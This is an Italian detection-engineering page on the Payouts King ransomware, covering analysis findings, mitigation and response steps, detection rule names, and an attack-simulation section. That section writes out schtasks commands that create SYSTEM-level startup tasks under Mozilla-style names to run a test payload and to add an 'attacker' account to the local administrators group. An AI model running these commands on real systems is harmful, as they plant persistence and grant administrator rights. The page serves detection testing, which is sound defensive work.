Il Re delle Ricompense Punta al Trono del Ransomware
Detection stack
- AIDR
- Alert
- ETL
- Query
Indagine
ThreatLabz ha analizzato diversi campioni di ransomware, invertendo le funzioni di hash personalizzate CRC e FNV1 utilizzate dal malware e identificando la persistenza attraverso compiti pianificati. I ricercatori hanno anche documentato il meccanismo di cifratura, le estensioni dei file mirate e il flusso di esecuzione complessivo. La loro analisi ha rivelato un elenco integrato di processi relativi alla sicurezza che il ransomware tenta di terminare utilizzando chiamate di sistema a basso livello prima che inizi la cifratura. Ulteriori indicatori, inclusi parametri da linea di comando e schemi di estensioni di file, sono stati estratti direttamente dai campioni per supportare gli sforzi di rilevamento e caccia.
Mitigazione
Le organizzazioni dovrebbero applicare l’autenticazione a più fattori, addestrare gli utenti a riconoscere i tentativi di ingegneria sociale e monitorare l’uso sospetto di strumenti come Microsoft Teams e Quick Assist. I difensori dovrebbero inoltre bloccare le estensioni di file note per essere correlate al ransomware e implementare rilevamenti endpoint in grado di identificare la creazione di compiti pianificati sotto il percorso Mozilla, così come le chiamate a SetFileInformationByHandle con FileRenameInfo. I backup offline dovrebbero essere mantenuti con regolarità, e le copie shadow dovrebbero essere protette per migliorare le opzioni di recupero in caso di cifratura.
Risposta
Se viene rilevata un’attività di Payouts King, isolare immediatamente il sistema colpito e raccogliere sia la memoria volatile che le immagini del disco per l’analisi forense. Gli investigatori dovrebbero esaminare i compiti pianificati alla ricerca di nomi come MozillaUpdateTask and MozillaElevateTask, quindi cercare gli argomenti della linea di comando CRC personalizzati e le estensioni uniche dei file criptati associate al malware. Il recupero dovrebbe concentrarsi sul ripristino dei dati da backup puliti verificati. I team di sicurezza dovrebbero inoltre inviare gli hash dei campioni identificati alle piattaforme di intelligence sulle minacce pertinenti per supportare il tracciamento e la difesa più ampia.
Flusso di Attacco
Rilevamenti
Possibile Uso di Schtasks o AT per Persistenza (via cmdline)
Visualizza
Attività VSSADMIN Sospetta (via cmdline)
Visualizza
IoC (HashSha256) per rilevare: Payouts King Mira al Trono del Ransomware
Visualizza
Persistenza delle Attività Pianificate del Ransomware Payouts King [Creazione Processo Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre‑volo di Telemetria & Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttemente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati portano a diagnosi errate.
-
Narrazione & Comandi di Attacco:
L’attaccante, avendo ottenuto l’accesso iniziale, vuole assicurarsi che il ransomware sia eseguito ad ogni riavvio del sistema e acquisisca privilegi di SYSTEM. Usano l’eseguibile nativo
schtasks.exeper evitare di introdurre strumenti di terze parti. Prima, creano un “UpdateTask” che esegue un payload di ransomware di prova, quindi creano e eseguono immediatamente un “ElevateTask” che genera un processo privilegiato per proseguire la catena di infezione. Entrambi i compiti sono collocati sotto lonamespace Mozilla per imitare il noto pattern di Payouts King.Crea UpdateTask:-
Create UpdateTask:
schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:Temppayouts_king.exe" -
Crea ElevateTask:
schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker" -
Esegui immediatamente ElevateTask:
schtasks.exe /run /tn MozillaElevateTask -
(Opzionale) Verifica che i compiti esistano:
schtasks.exe /query /tn Mozilla* /fo LIST /v
Queste righe di comando esatte corrispondono alle
selezione1andselezione2clausole della regola Sigma, soddisfacendo lacondizione: selezione1 e selezione2 e non esclusione. -
-
Script di Test di Regressione:
# Simulazione di Persistenza delle Attività Pianificate Payouts King # ------------------------------------------------- # Passo 1: Crea l'UpdateTask (persistenza all'avvio) schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:Temppayouts_king.exe" # Passo 2: Crea l'ElevateTask (aiuto di elevazione privilegi) schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker" # Passo 3: Esegui l'ElevateTask immediatamente per generare il secondo evento di rilevamento schtasks.exe /run /tn MozillaElevateTask # Passo 4: Output di conferma (non richiesto per rilevamento, per visibilità dell'operatore) Write-Host "Compiti pianificati creati e ElevateTask eseguito." -
Comandi di Pulizia:
# Rimuovi i compiti creati per il test schtasks.exe /delete /tn MozillaElevateTask /f schtasks.exe /delete /tn MozillaUpdateTask /f # Opzionalmente elimina il payload di prova Remove-Item -Path "C:Temppayouts_king.exe" -ErrorAction SilentlyContinue